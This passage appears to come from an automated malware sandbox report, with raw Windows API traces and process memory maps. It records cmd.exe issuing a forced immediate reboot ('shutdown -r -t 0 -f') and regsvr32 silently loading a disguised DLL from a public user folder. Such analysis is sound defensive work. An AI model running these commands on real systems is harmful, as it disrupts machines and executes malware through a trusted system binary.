hFindFile=0x2f30d8) returned 1 [0229.326] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\shutdown.COM", fInfoLevelId=0x1, lpFindFileData=0x26f208, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f208) returned 0xffffffff [0229.326] GetLastError () returned 0x2 [0229.327] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\shutdown.EXE", fInfoLevelId=0x1, lpFindFileData=0x26f208, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f208) returned 0x2f30d8 [0229.327] FindClose (in: hFindFile=0x2f30d8 | out: hFindFile=0x2f30d8) returned 1 [0229.327] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0229.327] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0229.327] GetConsoleTitleW (in: lpConsoleTitle=0x26f700, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0229.327] GetConsoleTitleW (in: lpConsoleTitle=0x2e0848, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0229.328] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\System32\\cmd.exe - shutdown -r -t 0 -f") returned 1 [0229.328] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f588, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f650 | out: lpAttributeList=0x26f588, lpSize=0x26f650) returned 1 [0229.328] UpdateProcThreadAttribute (in: lpAttributeList=0x26f588, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f648, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f588, lpPreviousValue=0x0) returned 1 [0229.328] GetStartupInfoW (in: lpStartupInfo=0x26f544 | out: lpStartupInfo=0x26f544*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x400000, hStdOutput=0x2e0838, hStdError=0x26f674)) [0229.328] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\Windows\\System32", _MaxCount=0x7) returned 38 [0229.328] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSERSPROFILE=C:\\ProgramData", _MaxCount=0x7) returned 2 [0229.328] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA=C:\\Users\\DSsDPMx042\\AppData\\Roaming", _MaxCount=0x7) returned 2 [0229.328] _wcsnicmp (_String1="COPYCMD", _String2="CommonProgramFiles=C:\\Program Files\\Common Files", _MaxCount=0x7) returned 3 [0229.328] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTERNAME=N3EERVTWSM", _MaxCount=0x7) returned 3 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec=C:\\Windows\\system32\\cmd.exe", _MaxCount=0x7) returned 3 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_HOST_CHECK=NO", _MaxCount=0x7) returned -3 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRIVE=C:", _MaxCount=0x7) returned -5 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPATH=\\Users\\DSsDPMx042", _MaxCount=0x7) returned -5 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAPPDATA=C:\\Users\\DSsDPMx042\\AppData\\Local", _MaxCount=0x7) returned -9 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSERVER=\\\\N3EERVTWSM", _MaxCount=0x7) returned -9 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_OF_PROCESSORS=1", _MaxCount=0x7) returned -11 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="OS=Windows_NT", _MaxCount=0x7) returned -12 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", _MaxCount=0x7) returned -13 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", _MaxCount=0x7) returned -13 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="PROCESSOR_ARCHITECTURE=x86", _MaxCount=0x7) returned -13 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="PROCESSOR_IDENTIFIER=x86 Family 6 Model 45 Stepping 7, GenuineIntel", _MaxCount=0x7) returned -13 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="PROCESSOR_LEVEL=6", _MaxCount=0x7) returned -13 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="PROCESSOR_REVISION=2d07", _MaxCount=0x7) returned -13 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="ProgramData=C:\\ProgramData", _MaxCount=0x7) returned -13 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="ProgramFiles=C:\\Program Files", _MaxCount=0x7) returned -13 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=$P$G", _MaxCount=0x7) returned -13 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", _MaxCount=0x7) returned -13 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=C:\\Users\\Public", _MaxCount=0x7) returned -13 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="SystemDrive=C:", _MaxCount=0x7) returned -16 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="SystemRoot=C:\\Windows", _MaxCount=0x7) returned -16 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:\\Users\\DSSDPM~1\\AppData\\Local\\Temp", _MaxCount=0x7) returned -17 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\Users\\DSSDPM~1\\AppData\\Local\\Temp", _MaxCount=0x7) returned -17 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="USERDOMAIN=N3EERVTWSM", _MaxCount=0x7) returned -18 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="USERNAME=DSsDPMx042", _MaxCount=0x7) returned -18 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="USERPROFILE=C:\\Users\\DSsDPMx042", _MaxCount=0x7) returned -18 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="windir=C:\\Windows", _MaxCount=0x7) returned -20 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="windows_tracing_flags=3", _MaxCount=0x7) returned -20 [0229.329] _wcsnicmp (_String1="COPYCMD", _String2="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", _MaxCount=0x7) returned -20 [0229.330] lstrcmpW (lpString1="\\shutdown.exe", lpString2="\\XCOPY.EXE") returned -1 [0229.331] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\shutdown.exe", lpCommandLine="shutdown -r -t 0 -f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x26f5e4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="shutdown -r -t 0 -f", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f630 | out: lpCommandLine="shutdown -r -t 0 -f", lpProcessInformation=0x26f630*(hProcess=0x50, hThread=0x4c, dwProcessId=0x9ec, dwThreadId=0x9f0)) returned 1 [0229.348] CloseHandle (hObject=0x4c) returned 1 [0229.348] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0229.348] GetEnvironmentStringsW () returned 0x2f1f68 [0229.348] FreeEnvironmentStringsW (penv=0x2f1f68) returned 1 [0229.348] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0229.520] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f524 | out: lpExitCode=0x26f524*=0x0) returned 1 [0229.520] CloseHandle (hObject=0x50) returned 1 [0229.520] _vsnwprintf (in: _Buffer=0x26f66c, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f530 | out: _Buffer="00000000") returned 8 [0229.520] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0229.520] GetEnvironmentStringsW () returned 0x2f3128 [0229.520] FreeEnvironmentStringsW (penv=0x2f3128) returned 1 [0229.520] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0229.520] GetEnvironmentStringsW () returned 0x2f3128 [0229.520] FreeEnvironmentStringsW (penv=0x2f3128) returned 1 [0229.520] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f588 | out: lpAttributeList=0x26f588) [0229.520] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 1 [0229.524] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.524] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0229.524] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.524] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8341ac | out: lpMode=0x4a8341ac) returned 1 [0229.524] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.524] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8341b0 | out: lpMode=0x4a8341b0) returned 1 [0229.524] SetConsoleInputExeNameW () returned 0x1 [0229.524] GetConsoleOutputCP () returned 0x1b5 [0229.524] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a834260 | out: lpCPInfo=0x4a834260) returned 1 [0229.525] SetThreadUILanguage (LangId=0x0) returned 0x409 [0229.525] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.525] GetFileType (hFile=0x3) returned 0x2 [0229.525] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0229.527] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x26fdec | out: lpMode=0x26fdec) returned 1 [0229.528] NtOpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x26fba8 | out: TokenHandle=0x26fba8*=0x0) returned 0xc000007c [0229.528] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x26fba8 | out: TokenHandle=0x26fba8*=0x50) returned 0x0 [0229.528] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x26fb74, TokenInformationLength=0x4, ReturnLength=0x26fb88 | out: TokenInformation=0x26fb74, ReturnLength=0x26fb88) returned 0x0 [0229.528] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x26fb80, TokenInformationLength=0x4, ReturnLength=0x26fb84 | out: TokenInformation=0x26fb80, ReturnLength=0x26fb84) returned 0x0 [0229.528] NtClose (Handle=0x50) returned 0x0 [0229.529] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x26fbb0, nSize=0x0, Arguments=0x26fbac | out: lpBuffer="ࡀ.ﷰ&썓䪁❈䀀\x02") returned 0xf [0229.529] GetConsoleTitleW (in: lpConsoleTitle=0x26fbe4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0229.529] wcsstr (_Str="C:\\Windows\\System32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0229.529] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\cmd.exe") returned 1 [0229.530] LocalFree (hMem=0x2e0840) returned 0x0 [0229.530] _vsnwprintf (in: _Buffer=0x4a844640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26fad8 | out: _Buffer="\r\n") returned 2 [0229.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.530] GetFileType (hFile=0x7) returned 0x2 [0229.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.531] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26fa98 | out: lpMode=0x26fa98) returned 1 [0229.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.531] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a844640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fac4, lpReserved=0x0 | out: lpBuffer=0x4a844640*, lpNumberOfCharsWritten=0x26fac4*=0x2) returned 1 [0229.531] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a840640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0229.531] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a835260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0229.531] _vsnwprintf (in: _Buffer=0x4a835e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26fad4 | out: _Buffer="C:\\Windows\\system32") returned 19 [0229.531] _vsnwprintf (in: _Buffer=0x4a835e66, _BufferCount=0x3eb, _Format="%c", _ArgList=0x26fad4 | out: _Buffer=">") returned 1 [0229.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.531] GetFileType (hFile=0x7) returned 0x2 [0229.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.532] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26fa9c | out: lpMode=0x26fa9c) returned 1 [0229.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0229.532] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a835e40*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x26fac8, lpReserved=0x0 | out: lpBuffer=0x4a835e40*, lpNumberOfCharsWritten=0x26fac8*=0x14) returned 1 [0229.532] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.532] GetFileType (hFile=0x3) returned 0x2 [0229.532] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.532] GetFileType (hFile=0x3) returned 0x2 [0229.533] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0229.533] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x26fd68 | out: lpMode=0x26fd68) returned 1 [0229.533] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.533] GetFileType (hFile=0x3) returned 0x2 [0229.533] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0229.533] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x26fd68 | out: lpMode=0x26fd68) returned 1 [0229.533] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.533] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26fd20 | out: lpConsoleScreenBufferInfo=0x26fd20) returned 1 [0229.533] ReadConsoleW (hConsoleInput=0x3, lpBuffer=0x4a83c640, nNumberOfCharsToRead=0x2000, lpNumberOfCharsRead=0x26fd88, pInputControl=0x26fd38) Process: id = "13" image_name = "shutdown.exe" filename = "c:\\windows\\system32\\shutdown.exe" page_root = "0x7f09e620" os_pid = "0x9ec" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x660" cmd_line = "shutdown -r -t 0 -f" cur_dir = "C:\\Windows\\system32\\" Region: id = 1328 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1329 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1330 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1331 start_va = 0x140000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1332 start_va = 0x410000 end_va = 0x419fff entry_point = 0x415cca region_type = mapped_file name = "shutdown.exe" filename = "\\Windows\\System32\\shutdown.exe" Region: id = 1333 start_va = 0x77200000 end_va = 0x7733bfff entry_point = 0x77200000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 1334 start_va = 0x77440000 end_va = 0x77440fff entry_point = 0x77440000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 1335 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1336 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1337 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1338 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1339 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1340 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 1341 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1342 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1343 start_va = 0x75260000 end_va = 0x75267fff entry_point = 0x752610e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" Region: id = 1344 start_va = 0x75280000 end_va = 0x7529afff entry_point = 0x752893b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" Region: id = 1345 start_va = 0x75510000 end_va = 0x75559fff entry_point = 0x75517de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 1346 start_va = 0x75900000 end_va = 0x759d3fff entry_point = 0x7594bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 1347 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x766649e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 1348 start_va = 0x76a90000 end_va = 0x76bebfff entry_point = 0x76adba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 1349 start_va = 0x76bf0000 end_va = 0x76c90fff entry_point = 0x76c22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 1350 start_va = 0x76ca0000 end_va = 0x76d68fff entry_point = 0x76cbd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 1351 start_va = 0x76dd0000 end_va = 0x76e1dfff entry_point = 0x76dd9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 1352 start_va = 0x76f70000 end_va = 0x7701bfff entry_point = 0x76f7a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 1353 start_va = 0x77020000 end_va = 0x770bcfff entry_point = 0x77053fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 1354 start_va = 0x77350000 end_va = 0x77359fff entry_point = 0x7735136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 1355 start_va = 0x773d0000 end_va = 0x773e8fff entry_point = 0x773d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 1356 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1357 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 1358 start_va = 0x75830000 end_va = 0x758fbfff entry_point = 0x7583168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 1359 start_va = 0x76630000 end_va = 0x7664efff entry_point = 0x76631355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Thread: id = 117 os_tid = 0x9f0 Thread: id = 118 os_tid = 0xa1c Process: id = "14" image_name = "regsvr32.exe" filename = "c:\\windows\\system32\\regsvr32.exe" page_root = "0x7f0a8300" os_pid = "0x574" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E\" #96" cur_dir = "C:\\Windows\\system32\\" Region: id = 1482 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1483 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1484 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1485 start_va = 0x140000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1486 start_va = 0xf30000 end_va = 0xf36fff entry_point = 0xf327c1 region_type = mapped_file name = "regsvr32.exe" filename = "\\Windows\\System32\\regsvr32.exe" Region: id = 1487 start_va = 0x77b60000 end_va = 0x77c9bfff entry_point = 0x77b60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 1488 start_va = 0x77da0000 end_va = 0x77da0fff entry_point = 0x77da0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 1489 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1490 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1491 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1492 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1493 start_va = 0x75f30000 end_va = 0x75f79fff entry_point = 0x75f37de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 1494 start_va = 0x77780000 end_va = 0x77853fff entry_point = 0x777cbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 1495 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1496 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 1497 start_va = 0x74c90000 end_va = 0x74e2dfff entry_point = 0x74cbe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" Region: id = 1498 start_va = 0x76010000 end_va = 0x7605dfff entry_point = 0x76019c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 1499 start_va = 0x76110000 end_va = 0x761b0fff entry_point = 0x76142433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 1500 start_va = 0x761c0000 end_va = 0x7626bfff entry_point = 0x761ca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 1501 start_va = 0x76270000 end_va = 0x76338fff entry_point = 0x7628d711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 1502 start_va = 0x77130000 end_va = 0x771cffff entry_point = 0x771449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 1503 start_va = 0x77580000 end_va = 0x7761cfff entry_point = 0x775b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 1504 start_va = 0x77620000 end_va = 0x7777bfff entry_point = 0x7766ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 1505 start_va = 0x77860000 end_va = 0x778b6fff entry_point = 0x77879ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 1506 start_va = 0x77cc0000 end_va = 0x77cc9fff entry_point = 0x77cc136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 1507 start_va = 0x77ce0000 end_va = 0x77cf8fff entry_point = 0x77ce4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 1508 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1509 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1510 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1511 start_va = 0x75fb0000 end_va = 0x75fcefff entry_point = 0x75fb1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 1512 start_va = 0x77a90000 end_va = 0x77b5bfff entry_point = 0x77a9168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 1513 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1514 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1515 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0xd0000 region_type = mapped_file name = "regsvr32.exe.mui" filename = "\\Windows\\System32\\en-US\\regsvr32.exe.mui" Region: id = 1516 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1517 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1518 start_va = 0x110000 end_va = 0x111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1519 start_va = 0x380000 end_va = 0x480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1520 start_va = 0xf40000 end_va = 0x1b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 1521 start_va = 0x75c00000 end_va = 0x75c0bfff entry_point = 0x75c010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" Region: id = 1522 start_va = 0x74b10000 end_va = 0x74b4ffff entry_point = 0x74b1a2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" Region: id = 1523 start_va = 0x490000 end_va = 0x56efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1524 start_va = 0x5d0000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1525 start_va = 0x610000 end_va = 0x764fff entry_point = 0x6e8670 region_type = mapped_file name = "N3Eg2.51N3E" filename = "\\Users\\Public\\N3Eg\\N3Eg2.51N3E" Region: id = 1526 start_va = 0x77a00000 end_va = 0x77a8efff entry_point = 0x77a03fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 1527 start_va = 0x770000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 1760 start_va = 0x8b0000 end_va = 0xb7efff entry_point = 0x8b0000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Thread: id = 120 os_tid = 0x578 [0260.512] GetCurrentThreadId () returned 0x578 [0260.512] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x1c4cc0 [0260.512] SetThreadLocale (Locale=0x400) returned 1 [0260.513] GetVersion () returned 0x1db10106 [0260.513] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77780000 [0260.513] GetProcAddress (hModule=0x77780000, lpProcName="GetThreadPreferredUILanguages") returned 0x777c22d7 [0260.513] GetModuleHandleW 